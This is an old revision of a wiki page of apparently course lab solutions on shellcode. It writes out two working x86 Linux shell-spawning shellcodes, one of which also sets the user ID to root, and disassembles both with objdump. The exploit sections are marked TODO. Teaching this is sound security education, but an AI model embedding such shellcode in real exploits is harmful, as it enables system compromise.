session:solution:09
This is an old revision of the document!
Table of Contents
Session 09 Solutions
Create and disassemble binary shellcodes
We extract the two shellcode byte strings from the given links (1, 2):
$ cat 216.print \x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff $ cat 827.print \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
and then we use echo
to generate two binary shellcode files:
$ echo -en '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff' > 216.bin $ echo -en '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > 827.bin
Afterwards, we disassemble the binary shellcode files:
$ objdump -D -b binary -m i386 -M intel 827.bin 827.bin: file format binary Disassembly of section .data: 00000000 <.data>: 0: 31 c0 xor eax,eax 2: 50 push eax 3: 68 2f 2f 73 68 push 0x68732f2f 8: 68 2f 62 69 6e push 0x6e69622f d: 89 e3 mov ebx,esp f: 50 push eax 10: 53 push ebx 11: 89 e1 mov ecx,esp 13: b0 0b mov al,0xb 15: cd 80 int 0x80 $ objdump -D -b binary -m i386 -M intel 216.bin 216.bin: file format binary Disassembly of section .data: 00000000 <.data>: 0: 6a 46 push 0x46 2: 58 pop eax 3: 31 db xor ebx,ebx 5: 31 c9 xor ecx,ecx 7: cd 80 int 0x80 9: eb 21 jmp 0x2c b: 5f pop edi c: 6a 0b push 0xb e: 58 pop eax f: 99 cdq 10: 52 push edx 11: 66 68 2d 63 pushw 0x632d 15: 89 e6 mov esi,esp 17: 52 push edx 18: 68 2f 2f 73 68 push 0x68732f2f 1d: 68 2f 62 69 6e push 0x6e69622f 22: 89 e3 mov ebx,esp 24: 52 push edx 25: 57 push edi 26: 56 push esi 27: 53 push ebx 28: 89 e1 mov ecx,esp 2a: cd 80 int 0x80 2c: e8 da ff ff ff call 0xb
and we compare the resulting assembly source code to the one in the initial links. We find they are identical conforming we did a proper generation and disassembling of the binary shellcode files.
Call Trampoline
TODO
Exploit with Known Buffer Address
TODO
Brute-Forcing the Buffer Address
TODO
NOP Sled
TODO
Environment variables
TODO
session/solution/09.1436392771.txt.gz ยท Last modified: by Razvan Deaconescu